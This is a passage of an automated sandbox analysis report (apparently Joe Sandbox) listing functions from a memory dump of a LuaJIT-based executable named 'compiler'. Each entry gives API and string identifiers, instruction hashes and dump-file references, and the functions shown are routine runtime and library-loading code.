                                                            Function 00007FF7BAD7B2DC Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 73libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$HandleLibraryLoadModule
                                                            • String ID: gdi32.dll$kernel32.dll$user32.dll
                                                            • API String ID: 384173800-3744471378
                                                            • Opcode ID: dd382285720a95e28be5a3817c0670030b4022801a23b84e252e128209891390
                                                            • Instruction ID: 05039f4fdba895df3ac691eb7d171cd98a3c9ebd5fe78c48eff39170462173a4
                                                            • Opcode Fuzzy Hash: dd382285720a95e28be5a3817c0670030b4022801a23b84e252e128209891390
                                                            • Instruction Fuzzy Hash: 9D316F21A18A4381FB58BB5DA444139A260FF66B90FD403B5EF5F4279CEF2CE4908220
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADBF4D4 Relevance: 12.2, APIs: 8, Instructions: 232pipeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo$CloseHandle$CreateErrorLastPipe_get_daylight
                                                            • String ID:
                                                            • API String ID: 1948035671-0
                                                            • Opcode ID: ba826eb37147a7471541f9975930f47155f7f65a9926a1a0abf1718b03b3dd88
                                                            • Instruction ID: 074177fbde9f93b858f26c7238b4666140d24d3f456042af4bb1754bf61498f7
                                                            • Opcode Fuzzy Hash: ba826eb37147a7471541f9975930f47155f7f65a9926a1a0abf1718b03b3dd88
                                                            • Instruction Fuzzy Hash: F3A19262A18B4692FB10BF1CD4902ADA7A0EBA6B90FD041B5EF4E4779DDE3CD445C720
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADB1F9C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 109COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: r$w$w
                                                            • API String ID: 3215553584-72812343
                                                            • Opcode ID: 3a4e77b131c05617f08a9e37a40c99e5ff9349be99b94a59cf3aa0ac3b8e813e
                                                            • Instruction ID: 09ecb99aae62bf1cc7ac39b8b0ac7e4dcc61806438105a85e2491f7271e78a92
                                                            • Opcode Fuzzy Hash: 3a4e77b131c05617f08a9e37a40c99e5ff9349be99b94a59cf3aa0ac3b8e813e
                                                            • Instruction Fuzzy Hash: 40418023A0D38656F720B66890112BAE791DFA6390FC445B5FB8D076DEDE6CE806C721
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD3F3EC Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _cwprintf_s_l
                                                            • String ID: "%s":%d$%p:%d$%s:%d$builtin:%s
                                                            • API String ID: 2941638530-71741676
                                                            • Opcode ID: 236020fd5ce62f38dfd1ed759ec21d88e6d172a5b0c587639d0298a60179092b
                                                            • Instruction ID: 1eb195bdae14e71891e761540f067da4ebe726b1a34aef9a1bd3ab4cc9c0ef65
                                                            • Opcode Fuzzy Hash: 236020fd5ce62f38dfd1ed759ec21d88e6d172a5b0c587639d0298a60179092b
                                                            • Instruction Fuzzy Hash: D521B561E0C746A1FB24BB1DE4401BDA7A0EB6AB90FC4D1B1DF5D0B69DDE2CD54A8320
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD7B600 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_cwprintf_s_l$FormatLibraryLoadMessage
                                                            • String ID: %s.dll$cannot load module '%s': %s
                                                            • API String ID: 1337525512-4289185444
                                                            • Opcode ID: 98458d1706f0bb634d508b31df80f5ac73f75edeba64ecafc7a196fc60e0896b
                                                            • Instruction ID: ad3600e6a48484b71f29c2e4b6b3599a98fc7094b7323caf9ae9f2fd0cf71855
                                                            • Opcode Fuzzy Hash: 98458d1706f0bb634d508b31df80f5ac73f75edeba64ecafc7a196fc60e0896b
                                                            • Instruction Fuzzy Hash: 4D11E761A05B4285F718BF2AA40056DA760EB5AFD0F9812B5EF6E1779ECE3CE040C350
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADCCFC4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                            • String ID: CONOUT$
                                                            • API String ID: 3230265001-3130406586
                                                            • Opcode ID: b506db57ca840562009c80aaabcee510d0a2174ecedcc781582b42457bf1e39d
                                                            • Instruction ID: 4068f92b7e5978699820138600576994b98c0d8aa8613d3ef1393e3419e08093
                                                            • Opcode Fuzzy Hash: b506db57ca840562009c80aaabcee510d0a2174ecedcc781582b42457bf1e39d
                                                            • Instruction Fuzzy Hash: 2B11B471A18A4182F750BB4AE844329E2A0FB69FE4F840274DF5D437ACDF3CD4208790
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADAE910 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _set_statfp
                                                            • String ID: "$cosh
                                                            • API String ID: 1156100317-3800341493
                                                            • Opcode ID: e6b0742caf670236840a04efbfea6e75828a0c07c85961bc3a6d45e206db4e08
                                                            • Instruction ID: d0e223bd5c06623d797e65d37c2e8dd415577926f4418339350dd007b324491f
                                                            • Opcode Fuzzy Hash: e6b0742caf670236840a04efbfea6e75828a0c07c85961bc3a6d45e206db4e08
                                                            • Instruction Fuzzy Hash: 76819521A28F8548E263AB389441376B354EF773D5F519337EB8E35A5DDF2CA1828710
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADC1150 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 157timeCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • _get_daylight.LIBCMT ref: 00007FF7BADC1173
                                                              • Part of subcall function 00007FF7BADC0A2C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7BADC0A40
                                                            • _get_daylight.LIBCMT ref: 00007FF7BADC1184
                                                              • Part of subcall function 00007FF7BADC09CC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7BADC09E0
                                                            • _get_daylight.LIBCMT ref: 00007FF7BADC1195
                                                              • Part of subcall function 00007FF7BADC09FC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7BADC0A10
                                                              • Part of subcall function 00007FF7BADB76B0: HeapFree.KERNEL32(?,?,?,00007FF7BADC6C64,?,?,?,00007FF7BADC6FE7,?,?,00000019,00007FF7BADC7754,?,?,?,00007FF7BADC7687), ref: 00007FF7BADB76C6
                                                              • Part of subcall function 00007FF7BADB76B0: GetLastError.KERNEL32(?,?,?,00007FF7BADC6C64,?,?,?,00007FF7BADC6FE7,?,?,00000019,00007FF7BADC7754,?,?,?,00007FF7BADC7687), ref: 00007FF7BADB76D8
                                                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7BADC13C9), ref: 00007FF7BADC11BC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                            • String ID: ?
                                                            • API String ID: 3458911817-1684325040
                                                            • Opcode ID: 75434a381a045e3b63c0f641f777f5e44c365bcd1fea515ad1ebee15de209c33
                                                            • Instruction ID: 1c6a90bf44d9b90ca28031ca33305098dff84b9f851ba15900be8ee93e16d39f
                                                            • Opcode Fuzzy Hash: 75434a381a045e3b63c0f641f777f5e44c365bcd1fea515ad1ebee15de209c33
                                                            • Instruction Fuzzy Hash: A2617F32A186528AF764FF2898411B9B6A0FB66794FC40176FF4D4269DEF3CD44187A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD76CBC Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 144COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _cwprintf_s_l
                                                            • String ID: %s%s$align$line$pragma
                                                            • API String ID: 2941638530-805442268
                                                            • Opcode ID: 8598c8176d2a0c90837c3d2a8fb947fcbf0cc9f5e3f9b8ebcc25a742279f1c8d
                                                            • Instruction ID: 501c52590b1a440b34e04307e8304af42765843ffaeac462468deee258792fad
                                                            • Opcode Fuzzy Hash: 8598c8176d2a0c90837c3d2a8fb947fcbf0cc9f5e3f9b8ebcc25a742279f1c8d
                                                            • Instruction Fuzzy Hash: 3E518135A0824281FA6CBB2DD55017CA690EB27B50FC482B5EF2E476CDDE3CE8508730
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD3CB7C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 116COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: ContextException$CaptureDestructEntryFunctionLookupObjectRaiseRestoreUnwind
                                                            • String ID: CCG $csm
                                                            • API String ID: 616248213-2763669848
                                                            • Opcode ID: 4e7817ce6f288849aedca787e2168d04eadd440b4c9e4e09fcf62118e0c92a13
                                                            • Instruction ID: 25038c59e149c85925b7cc0332bda996860a834d8ac9982d2893aee36314ee05
                                                            • Opcode Fuzzy Hash: 4e7817ce6f288849aedca787e2168d04eadd440b4c9e4e09fcf62118e0c92a13
                                                            • Instruction Fuzzy Hash: 5241C036F0874641F624BB2AA444779A2A0EB6AB80FD84471DF4D4B79DDE3CE4568310
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD57CDC Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 99libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID: luaJIT_BC_%s$luaopen_%s$path too long
                                                            • API String ID: 1029625771-1241789697
                                                            • Opcode ID: 370c9ef587ad28d54dfd46ed9ca5c486620e177fe0a7b66d2da1aa80658216ea
                                                            • Instruction ID: b1f655a8c15468a51d3f1f8f04a1492ed68170696d007a0811613319150bbabf
                                                            • Opcode Fuzzy Hash: 370c9ef587ad28d54dfd46ed9ca5c486620e177fe0a7b66d2da1aa80658216ea
                                                            • Instruction Fuzzy Hash: 12317C55B0874280FE54BA1BA905279D291EF67FD0FA849B2EE1D07B8EDE2CE4418760
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD787E4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 87COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _cwprintf_s_l
                                                            • String ID: %s at line %d$char(%d)
                                                            • API String ID: 2941638530-3672627310
                                                            • Opcode ID: 12825654df19f64c711d89de86f4b50516196713fd31a6af4f5ec3310165bade
                                                            • Instruction ID: 27fba89dfbe2b7e0d17daabb06cb820b0ecd3d906741311ebadf101899358661
                                                            • Opcode Fuzzy Hash: 12825654df19f64c711d89de86f4b50516196713fd31a6af4f5ec3310165bade
                                                            • Instruction Fuzzy Hash: 1631C032B0864245FB19FB5EE5802BCA791EB66B84F8480B1DF0D4BA4DDF2CE4818360
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADA99B4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-1276376045
                                                            • Opcode ID: 101f8e2bc0e791e36a3a4aca2a9863df0efecd85205e5cd5f5ffb624f5b21ee6
                                                            • Instruction ID: bbb3b12354f6e7689ea57d9e82f1d89e4f94ec1a6b3a374123bfa83519a05042
                                                            • Opcode Fuzzy Hash: 101f8e2bc0e791e36a3a4aca2a9863df0efecd85205e5cd5f5ffb624f5b21ee6
                                                            • Instruction Fuzzy Hash: 13F09060A1964291FB447B59E4803389320EF69740FC4147ADF4F4226CEE2CE498C360
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADBB374 Relevance: 7.7, APIs: 5, Instructions: 203COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7BADBB3B5
                                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF7BADBB333,?,?,FFFFFFFE,00007FF7BADBB71E), ref: 00007FF7BADBB474
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF7BADBB333,?,?,FFFFFFFE,00007FF7BADBB71E), ref: 00007FF7BADBB4F4
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 2210144848-0
                                                            • Opcode ID: b6d45702f668699fd82a6bc176a3cbcd71ef6015d1b29c91b7a2486a46dc003c
                                                            • Instruction ID: a0d4af17e2058729a44b169482ef54fba98996b38e68a5eaa480816ab65fac40
                                                            • Opcode Fuzzy Hash: b6d45702f668699fd82a6bc176a3cbcd71ef6015d1b29c91b7a2486a46dc003c
                                                            • Instruction Fuzzy Hash: ED819F22E1875265FB10BB6D95902BCA6A0FB66784FC44275EF0E1379DDE3CA441C320
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADBE328 Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _set_statfp
                                                            • String ID:
                                                            • API String ID: 1156100317-0
                                                            • Opcode ID: 12adca675967658979367eabfb8a734187339238eb457c3420354a8a15eeb906
                                                            • Instruction ID: 473410c97d4627c34b9c5ff9b113ae256e5aab23eedaf1b3619104213aec6716
                                                            • Opcode Fuzzy Hash: 12adca675967658979367eabfb8a734187339238eb457c3420354a8a15eeb906
                                                            • Instruction Fuzzy Hash: 3651C422908A4665F662BE3C945077AE2A1FF62350FC482B9FF5E175DCEF3CE4418620
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD37C50 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 136stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: strstr
                                                            • String ID: '<eof>'$=stdin$error calling 'print' (%s)$print
                                                            • API String ID: 1392478783-2704460267
                                                            • Opcode ID: 213a096331f9803102432aa97e13902e4b357acc0f52f1d92bba3a7f6f692b58
                                                            • Instruction ID: f7fcfa34743b757525aca417d42aed5dccac812da9028c4639986d22ce3d39c5
                                                            • Opcode Fuzzy Hash: 213a096331f9803102432aa97e13902e4b357acc0f52f1d92bba3a7f6f692b58
                                                            • Instruction Fuzzy Hash: 5C416911F0C95241FA14F72EAA512BD92A2DFA7BD0FC042B0EF1D1B6DEDE3CA5024661
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BADBDED0 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _set_statfp
                                                            • String ID:
                                                            • API String ID: 1156100317-0
                                                            • Opcode ID: 12683ee949a498a76d615f5c80dca171e6a4e98699c78b4ade9d4b7d37fa3cf1
                                                            • Instruction ID: 6a71141cc6c7b7a72f8a2e235e017ca68fdb66b0db4006c213db286da550b8bf
                                                            • Opcode Fuzzy Hash: 12683ee949a498a76d615f5c80dca171e6a4e98699c78b4ade9d4b7d37fa3cf1
                                                            • Instruction Fuzzy Hash: 70113766E1CB8321F659362CA4423759150EF7A374FC406B4FFEE062DE8E1CAC418124
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00007FF7BAD57C68 Relevance: 7.5, APIs: 5, Instructions: 31libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF7BAD57DD9,?,?,?,00007FF7BAD57393), ref: 00007FF7BAD57C7A
